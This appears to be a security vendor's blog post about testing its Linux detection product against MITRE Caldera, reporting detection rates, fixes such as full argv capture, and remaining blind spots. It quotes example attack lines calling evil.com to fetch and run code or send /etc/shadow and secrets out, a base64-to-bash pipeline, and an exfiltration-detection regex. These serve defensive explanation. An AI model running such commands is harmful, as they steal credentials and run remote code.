Validation

We Ran MITRE Caldera Against Our Own Product. Here's What We Found.


We have 65 MITRE ATT&CK technique IDs mapped in our detectors. That sounds impressive until you ask a simple question: do they actually work? Having a technique ID in your code is not the same as detecting that technique in practice. We needed to find out.

So we set up MITRE Caldera, pointed it at a VM running our full stack, and ran 5 rounds of testing over 2 days. Round 1 was humbling. By Round 5, we had a much better product. This is what happened.

What is MITRE Caldera

Caldera is an open-source adversary emulation framework built by MITRE. Version 5.3.0, the one we used, ships with hundreds of attack abilities mapped to ATT&CK techniques. You deploy a lightweight agent (called Sandcat) on a target machine, define an adversary profile with the techniques you want to test, and let it run. Caldera executes each technique, reports success or failure, and gives you a structured record of what happened.

It is not a penetration testing tool. It does not find vulnerabilities. It executes known attack behaviors so you can validate whether your detections actually fire. Think of it as unit tests for your security product, written by the people who maintain the ATT&CK framework.

Our test setup

We used a local Ubuntu 24.04 ARM64 VM running in UTM on a Mac. The VM had the full InnerWarden stack deployed: sensor with all 40 eBPF hooks active, the agent running AI triage, and all satellite services (killchain, shield, DNA). Real services were running too: nginx, PostgreSQL, SSH. This was not a clean-room test. It was a realistic production-like environment.

Test environment
Caldera server: Mac local, v5.3.0
Sandcat agent:  Ubuntu 24.04 ARM64 VM (UTM)
InnerWarden:    sensor + agent + killchain + shield + dna
eBPF hooks:     40 active (tracepoints, kprobes, LSM, XDP)
Real services:  nginx, postgresql, sshd
Adversary:      "InnerWarden Full Validation" (114 techniques)

The Caldera server ran on the Mac host. Sandcat, compiled for ARM64, ran on the VM as the attack agent. We created a custom adversary profile called "InnerWarden Full Validation" with 114 Linux-applicable ATT&CK techniques. One small patch was needed: disabling the internal IP check so the sensor would process events from the Mac's 192.168.x.x address. This patch was local only, never committed.
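For reference, a Caldera adversary profile is plain YAML: an ID, a name, a description, and an ordered list of ability IDs. A trimmed, illustrative sketch of what a profile like ours looks like (the UUIDs below are placeholders, not our actual profile):

```yaml
# Illustrative Caldera adversary profile; all IDs are placeholders
adversary_id: 00000000-0000-0000-0000-000000000000
name: InnerWarden Full Validation
description: Linux-applicable ATT&CK techniques for detector validation
atomic_ordering:
  - 11111111-1111-1111-1111-111111111111   # e.g. a T1059.004 shell execution ability
  - 22222222-2222-2222-2222-222222222222   # e.g. a T1003.008 /etc/shadow access ability
```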

Round 1: 36% detection rate

The first run was rough. Out of the techniques Caldera successfully executed, we detected about 36%. The number was discouraging, but the reasons were illuminating.

The biggest issue was not missing detectors. We had the detectors. They just were not matching the events, because of three problems we did not anticipate:

  • Event kind mismatches: our detectors expected events tagged as "process.exec" but the eBPF collector was emitting them as "process.start". Same data, different label. The detector never saw the event because it filtered by kind first.
  • argv truncation: our eBPF tracepoint for sys_enter_execve only captured argv[0], the binary name. When Caldera ran curl http://evil.com/payload | bash, we saw "curl" but not the URL. When it ran base64 -d payload.b64, we saw "base64" but not the arguments. Most of our detection logic depended on argument patterns, and we were throwing them away.
  • False positive noise: the sensor was generating so many low-quality alerts from normal system activity that real attack events were buried. Caldera's Sandcat agent itself triggered multiple false positives on every heartbeat.
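The event kind mismatch is the kind of bug that is trivial once you see it. A minimal sketch of the normalization layer we ended up needing, with hypothetical labels and function names (our real taxonomy is larger):

```python
# Hypothetical sketch: map collector-specific event kinds to one canonical
# taxonomy BEFORE detectors filter by kind. Labels here are illustrative.
KIND_ALIASES = {
    "process.start": "process.exec",   # eBPF collector's label
    "proc_exec": "process.exec",       # journald collector's label
    "auth.login": "session.login",     # auth.log collector's label
}

def normalize(event: dict) -> dict:
    """Rewrite event['kind'] to the canonical label; unknown kinds pass through."""
    event["kind"] = KIND_ALIASES.get(event["kind"], event["kind"])
    return event

# A detector filtering on "process.exec" now sees the eBPF event:
assert normalize({"kind": "process.start"})["kind"] == "process.exec"
```

The key design point is doing this once at ingestion, so every detector downstream matches consistently regardless of which collector emitted the event.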

The fix that changed everything: full argv capture

The argv truncation problem was the most impactful. Our eBPF tracepoint captured argv[0] from the execve arguments, but eBPF has strict limits on how much data you can read from user memory. Reading a variable-length argument list inside a BPF program is genuinely hard because of the verifier's bounds checking.

The solution was to stop parsing the full argument list inside eBPF at all. Instead, after the eBPF event reaches userspace, we read /proc/PID/cmdline to get the complete argument vector. Because we hook sys_enter_execve (the entry, not the exit), the process is still alive when the sensor handles the event. The /proc read happens in the sensor collector, not in the eBPF program, so there are no verifier constraints.
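The userspace side of this is simple. A minimal sketch (function name is ours for illustration; the real collector also handles the narrow race where the process exits before the read):

```python
def read_cmdline(pid: int) -> list[str]:
    """Read the full argument vector from /proc/PID/cmdline.

    Arguments are NUL-separated with a trailing NUL, so we split on b"\\0"
    and drop empty elements. Returns [] if the process has already exited.
    """
    try:
        with open(f"/proc/{pid}/cmdline", "rb") as f:
            raw = f.read()
    except (FileNotFoundError, ProcessLookupError, PermissionError):
        return []
    return [arg.decode("utf-8", "replace") for arg in raw.split(b"\0") if arg]
```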

Before vs after
# Before: eBPF argv[0] only
event.argv = "curl"
# Detector for data exfil via curl: NO MATCH (no URL to inspect)

# After: full /proc/PID/cmdline
event.argv = "curl -s http://evil.com/c2 -d @/etc/shadow"
# Detector for data exfil via curl: MATCH (sees the URL + sensitive file)

This single change unlocked detection for dozens of techniques that depended on argument inspection: base64 obfuscation, curl/wget downloads, file exfiltration, reverse shell arguments, and crontab manipulation.
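To make the difference concrete, here is a toy argument-pattern detector. The regex is illustrative, not one of our production rules, but it shows why argv[0] alone was useless:

```python
import re

# Illustrative rule: curl posting a sensitive file to a remote URL.
# Not a production pattern; real rules are broader and tuned.
EXFIL_PATTERN = re.compile(
    r"\bcurl\b.*\bhttps?://\S+.*(?:-d|--data|--upload-file)\s+@?(?:/etc/shadow|/etc/passwd|\S*id_rsa\S*)"
)

def matches_exfil(argv: str) -> bool:
    return bool(EXFIL_PATTERN.search(argv))

# With only argv[0], there is nothing to match:
assert not matches_exfil("curl")
# With the full command line, the URL and sensitive file are visible:
assert matches_exfil("curl -s http://evil.com/c2 -d @/etc/shadow")
```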

Rounds 2 through 5: progressive improvement

Each round revealed new categories of problems. We fixed them and re-ran.

Detection rate progression
Round 1: 36% detection

Baseline test. Exposed argv truncation, event kind mismatches, and massive false positive volume.

Round 2: event normalization fixes

Unified event kinds across collectors. Fixed mismatches between eBPF, journald, and auth.log event labels. Added full argv capture from /proc/PID/cmdline.

Round 3: false positive cleanup

15+ false positive fixes. Dynamic allowlists for known system processes. Tuned thresholds for network scanning detection. Sandcat heartbeats no longer triggered alerts.

Round 4: new detectors

Added detectors for T1485 (data destruction), T1552.004 (private key discovery), and T1560 (archive collected data). These techniques were executing successfully with zero coverage.

Round 5: full stack validation

Real services running (nginx, PostgreSQL). Network attacks included. Base64 obfuscated payloads. This was the closest to a real-world scenario.

Final result: 67% of testable techniques detected

After 5 rounds, we stabilized at 67% detection of testable techniques. "Testable" is an important qualifier. Not all 114 techniques in our adversary profile could be meaningfully evaluated:

  • Some techniques require kernel features we do not hook yet (specific kernel module loads, certain ioctl calls).
  • Some techniques need Windows-specific payloads that Caldera skipped on Linux.
  • Some techniques failed to execute on our ARM64 VM because the Caldera abilities assumed x86_64.

When we exclude techniques that either failed to execute or require fundamentally different kernel hooks, 67% of the remaining set triggered at least one InnerWarden alert. That is honest, not heroic. But it is validated.

Numbers
MITRE technique IDs mapped:       65
Caldera techniques in profile:    114
Techniques that executed:         ~85
Testable (within our hook scope): ~75
Detected:                         ~50
Detection rate (testable):        67%
Detection rate (all executed):    ~59%
Validated through Caldera:        40% of our 65 mapped IDs

The gap between "65 technique IDs mapped" and "40% validated through Caldera" tells you something important. Having a technique ID in a comment next to your detector function does not mean you detect that technique. Caldera proved that about 60% of our mapped techniques need either better event coverage, additional correlation, or entirely new detection logic to work in practice.

What we cannot detect yet

Transparency matters more than marketing. Here are the categories where InnerWarden has real gaps:

  • Pure shell builtins: commands like echo, printf, and read are shell builtins. They execute inside the bash process itself without calling execve. Our eBPF tracepoint on sys_enter_execve never fires. An attacker using only builtins to exfiltrate data (for example, echo $SECRET > /dev/tcp/evil.com/443) produces no execve event. The connect tracepoint might catch the outbound connection, but the command itself is invisible.
  • Memory-only attacks without execve: if an attacker exploits a running process (buffer overflow, ROP chain) and never calls execve, we see the process's existing PID but cannot attribute new behavior to an exploit. We catch the side effects (unexpected network connections, file access) but not the exploitation itself.
  • Kernel exploits: attacks that exploit kernel vulnerabilities to escalate privileges may bypass our kprobe on commit_creds if they modify credentials through a different code path. We detect most privilege escalation, but a sufficiently novel kernel exploit could evade it.
  • file.write_access coverage: our openat tracepoint captures file opens, but coverage for write-specific access patterns is incomplete. Some techniques that modify files (like crontab injection or .bashrc modification) are detected through the process that writes them, not through the file operation itself. If the writing process looks benign, we miss it.
  • Correlation-dependent techniques: some ATT&CK techniques are not a single event but a sequence. Lateral movement, for example, involves credential access followed by remote login followed by execution on a new host. Detecting these requires multi-event correlation across time windows. We have 30 correlation rules, but not all technique sequences are covered.
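The correlation gap is worth a sketch. Our real rules are richer, but the core shape of a windowed multi-event rule looks roughly like this (event kinds, fields, and the 300-second window are all illustrative assumptions):

```python
from collections import deque

WINDOW_SECS = 300  # illustrative correlation window

class LateralMovementRule:
    """Toy rule: credential access followed by outbound SSH within a window."""

    def __init__(self):
        self.cred_events = deque()  # (timestamp, pid) of credential-access events

    def feed(self, event):
        ts, kind = event["ts"], event["kind"]
        # Expire credential-access events that fell outside the window.
        while self.cred_events and ts - self.cred_events[0][0] > WINDOW_SECS:
            self.cred_events.popleft()
        if kind == "file.read" and event.get("path") == "/etc/shadow":
            self.cred_events.append((ts, event["pid"]))
            return None
        if kind == "net.connect" and event.get("dport") == 22 and self.cred_events:
            return {"alert": "possible lateral movement", "ts": ts}
        return None

rule = LateralMovementRule()
rule.feed({"ts": 0, "kind": "file.read", "path": "/etc/shadow", "pid": 42})
# SSH connect inside the window correlates; the same connect much later does not.
assert rule.feed({"ts": 120, "kind": "net.connect", "dport": 22, "pid": 42}) is not None
assert rule.feed({"ts": 1000, "kind": "net.connect", "dport": 22, "pid": 42}) is None
```

The hard part in practice is not the window mechanics but deciding which event pairs are worth correlating without drowning in false positives.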

What we improved because of Caldera

The testing was not just about measuring detection rates. It drove concrete improvements:

Changes shipped
Full argv from /proc/PID/cmdline

Replaced eBPF-only argv[0] capture with userspace /proc read for complete command lines. Single biggest improvement to detection accuracy.

15+ false positive fixes

Dynamic allowlists for package managers, cron jobs, systemd units, and monitoring agents. Reduced alert noise by roughly 70% without losing real detections.
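The shape of those allowlists, roughly (patterns and the helper name here are illustrative, not our shipped list):

```python
import fnmatch

# Illustrative allowlist: (process-name pattern, event-kind pattern) pairs.
# Real entries are scoped more tightly and loaded dynamically.
ALLOWLIST = [
    ("apt*", "process.exec"),            # package managers
    ("unattended-upgr*", "*"),
    ("cron", "process.exec"),            # cron spawning jobs
    ("systemd*", "*"),
]

def is_allowlisted(comm: str, kind: str) -> bool:
    return any(
        fnmatch.fnmatch(comm, comm_pat) and fnmatch.fnmatch(kind, kind_pat)
        for comm_pat, kind_pat in ALLOWLIST
    )

assert is_allowlisted("apt-get", "process.exec")
assert not is_allowlisted("curl", "process.exec")
```

Scoping each entry to both a process pattern and an event kind is what lets this cut noise without blanket-suppressing everything a system process does.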

3 new detectors

T1485 (data destruction via rm, shred, wipe), T1552.004 (searching for private keys and certificates), T1560 (archiving collected data before exfiltration).

Event kind normalization

Unified event taxonomy across eBPF, journald, auth.log, and nginx collectors. Detectors now match consistently regardless of the event source.

Base64 obfuscation detection

With full argv, we now detect echo payload | base64 -d | bash patterns that were previously invisible.

The lesson: mapped is not detected

The most important takeaway from this exercise is something the security industry does not talk about enough. Every EDR vendor publishes a MITRE ATT&CK matrix with colored cells showing which techniques they cover. Those matrices are aspirational, not validated. Having a detector function tagged with a technique ID means someone wrote code that should, in theory, catch that technique. It does not mean the detector fires when the technique actually executes on a real system.

Between the technique definition and actual detection, there are dozens of failure points: event kind mismatches, argument truncation, false positive filtering that is too aggressive, missing event sources, correlation windows that are too narrow, and platform-specific behaviors that differ from what you tested in development.

We started with 65 technique IDs mapped in our codebase. Caldera validated about 40% of them. That does not mean the other 60% are broken. It means we have not proven they work yet. There is a difference, but only if you are willing to keep testing.

What is next

We plan to run Caldera continuously, not just as a one-time validation. Every new detector gets tested against the relevant Caldera ability before it ships. The goal is to move from 67% toward 85%+ on testable techniques, while being honest that some categories (kernel exploits, pure builtins) may never reach 100% without fundamentally different instrumentation.